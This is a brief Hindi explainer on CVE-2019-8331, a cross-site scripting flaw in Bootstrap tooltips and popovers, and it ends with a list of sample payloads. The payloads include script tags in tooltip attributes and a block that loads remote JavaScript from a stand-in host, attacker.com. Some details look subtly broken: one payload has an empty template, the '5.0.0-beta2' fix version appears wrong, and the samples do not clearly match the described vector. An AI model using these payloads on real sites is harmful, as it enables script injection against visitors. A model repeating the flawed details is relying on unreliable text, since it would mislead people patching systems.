
भेद्यता CVE-2019-8331
CVE-2019-8331 एक प्रकार का क्रॉस-साइट स्क्रिप्टिंग (XSS) सुरक्षा भेद्यता है जो Bootstrap में पाई जाती है, जो वेबसाइटों और मोबाइल अनुप्रयोगों के विकास में व्यापक रूप से उपयोग की जाने वाली जावास्क्रिप्ट लाइब्रेरी है। यह भेद्यता इसलिए उत्पन्न होती है क्योंकि Bootstrap tooltip या popover तत्व के data-template विशेषता के साथ भेजे गए डेटा को ठीक से फ़िल्टर नहीं करता है, जिससे हमलावर वेब पेज में दुर्भावनापूर्ण कोड इंजेक्ट कर सकता है।
यह हमला तब हो सकता है जब हमलावर tooltip या popover के रूप में दिखाए जाने वाले डेटा को नियंत्रित कर सकता है। जब उपयोगकर्ता tooltip या popover सक्रिय करता है, तो दुर्भावनापूर्ण कोड वेब पेज में इंजेक्ट हो जाता है और उपयोगकर्ता के ब्राउज़र द्वारा निष्पादित किया जा सकता है।
यह भेद्यता Bootstrap संस्करण 4.3.1 और 5.0.0-beta2 में ठीक कर दी गई है। व्यवस्थापकों को इस भेद्यता को ठीक करने के लिए प्रभावित Bootstrap संस्करण को अपडेट करना चाहिए।
CVE-2019-8331 भेद्यता के बारे में अतिरिक्त विवरण:
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>